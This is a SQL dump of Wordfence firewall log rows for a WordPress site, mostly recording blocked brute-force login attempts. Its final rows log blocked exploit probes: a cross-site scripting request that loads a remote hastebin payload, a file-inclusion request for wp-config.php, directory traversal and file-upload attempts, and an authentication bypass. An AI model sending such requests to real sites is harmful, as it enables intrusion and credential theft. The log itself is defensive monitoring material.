(4847, 0.000000, 1594856727.254316, 0x00000000000000000000ffffc0a3cfc8, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4848, 1594857319.831628, 1594857319.762800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4849, 0.000000, 1594858543.348144, 0x00000000000000000000ffff23e4d9f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://signpostsministries.org/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4850, 1594859263.878858, 1594859263.771500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4851, 0.000000, 1594859806.859354, 0x00000000000000000000ffffb956a463, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4852, 1594862998.514151, 1594862997.430900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4853, 1594861172.752837, 1594861172.259800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4854, 1594864961.768626, 1594864961.320600, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4855, 1594866504.084705, 1594866503.978700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4856, 0.000000, 1594866668.713739, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4857, 1594869520.890357, 1594869520.821000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4858, 1594868060.542278, 1594868060.496200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4859, 0.000000, 1594870387.518564, 0x00000000000000000000ffff80c79eb6, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4860, 1594870943.792549, 1594870943.715500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4861, 0.000000, 1594872281.955929, 0x00000000000000000000ffff17fb82d6, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://erima.eu/user/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4862, 1594872425.845009, 1594872425.760200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4863, 0.000000, 1594872964.398739, 0x00000000000000000000ffffbc4425c0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4864, 1594873894.465427, 1594873894.354900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4865, 1594876953.251625, 1594876953.196800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4866, 1594875435.769732, 1594875435.740300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4867, 0.000000, 1594877153.195209, 0x00000000000000000000ffff94428794, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4868, 0.000000, 1594879534.371072, 0x00000000000000000000ffff9df5f30e, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4869, 0.000000, 1594884532.628002, 0x00000000000000000000ffffb2805294, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4870, 0.000000, 1594887366.885504, 0x00000000000000000000ffff84941c14, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4871, 0.000000, 1594893153.170622, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4872, 0.000000, 1594893329.659342, 0x00000000000000000000ffff5e17de93, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4873, 0.000000, 1594896764.959220, 0x00000000000000000000ffff9df5284c, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4874, 0.000000, 1594898520.375946, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4875, 0.000000, 1594899020.109901, 0x00000000000000000000ffff23e4d9f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.mukejewelry.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4876, 0.000000, 1594902408.069818, 0x00000000000000000000ffff23e96983, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://mcquaig.co.uk/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4877, 0.000000, 1594903835.257276, 0x00000000000000000000ffff34ed4839, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4878, 0.000000, 1594906469.849994, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4879, 0.000000, 1594917260.562714, 0x00000000000000000000ffff68f44a2f, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0', 'loginFailInvalidUsername', NULL, NULL),
(4880, 0.000000, 1594924794.030686, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4881, 0.000000, 1594927601.505408, 0x00000000000000000000ffff23e96983, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://saunarekka.fi/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4882, 0.000000, 1594929645.041880, 0x00000000000000000000ffffc7f9e646, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4883, 0.000000, 1594934513.530762, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4884, 0.000000, 1594938545.020962, 0x00000000000000000000ffff73db8394, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.dierenartsvdc.be/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'loginFailInvalidUsername', NULL, NULL),
(4885, 0.000000, 1594941827.819649, 0x00000000000000000000ffff3ed2b2e5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4886, 0.000000, 1594950568.046991, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4887, 0.000000, 1594950821.058987, 0x00000000000000000000ffff23e96983, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://riverdanceofficecondo.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4888, 0.000000, 1594970220.790553, 0x00000000000000000000ffff23e4d9f0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://vitalinmobiliaria.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4889, 0.000000, 1594973537.783150, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4890, 0.000000, 1594976164.845686, 0x00000000000000000000ffff3ed2b1e0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4891, 0.000000, 1594982101.464086, 0x00000000000000000000ffffb956a463, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4892, 0.000000, 1595006918.342889, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4893, 0.000000, 1595011708.850488, 0x00000000000000000000ffff91ef01b6, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4894, 0.000000, 1595016058.774072, 0x00000000000000000000ffff23bd67a0, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://sandysoilfield.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4895, 0.000000, 1595016408.005744, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4896, 0.000000, 1595020100.130804, 0x00000000000000000000ffffb955efc3, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4897, 0.000000, 1595030586.365988, 0x00000000000000000000ffff23bde3df, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://dptaxservice.com/blog/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4898, 0.000000, 1595030831.337446, 0x00000000000000000000ffff96810818, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4899, 0.000000, 1595032653.308439, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4900, 0.000000, 1595039192.124349, 0x00000000000000000000ffff23e4cc33, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://dansk-e-logistik.dk/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4901, 1595039442.151227, 1595039441.998700, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting', '{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),
(4902, 1595039448.569742, 1595039448.528900, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/?gf_page=upload', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2dmb3JtX3VuaXF1ZV9pZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4v\",\"path\":\"Lw==\",\"category\":\"lfi\",\"ssl\":0}'),
(4903, 1595039448.256882, 1595039447.891700, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/?gf_page=upload', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2dmb3JtX3VuaXF1ZV9pZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4v\",\"path\":\"Lw==\",\"category\":\"lfi\",\"ssl\":0}'),
(4904, 1595039447.617893, 1595039447.586500, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(4905, 1595039446.849112, 1595039446.808200, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Slider Revolution: Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"60\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(4906, 1595039446.092309, 1595039446.074200, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-post.php?page=wysija_campaigns&action=themes', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'MailPoet <= 2.6.7 - Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(4907, 1595039444.790383, 1595039444.149800, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Malicious File Upload (Patterns)', '{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"file_upload\",\"ssl\":0}'),
(4908, 1595039456.305762, 1595039456.274900, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/?up_auto_log=true', NULL, 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0', 'blocked:waf', 'UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass', '{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":0}'),
(4909, 1595039463.760662, 1595039463.341500, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Malicious File Upload (Patterns)', '{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(4910, 1595039463.074274, 1595039462.488500, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-post.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Malicious File Upload (Patterns)', '{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
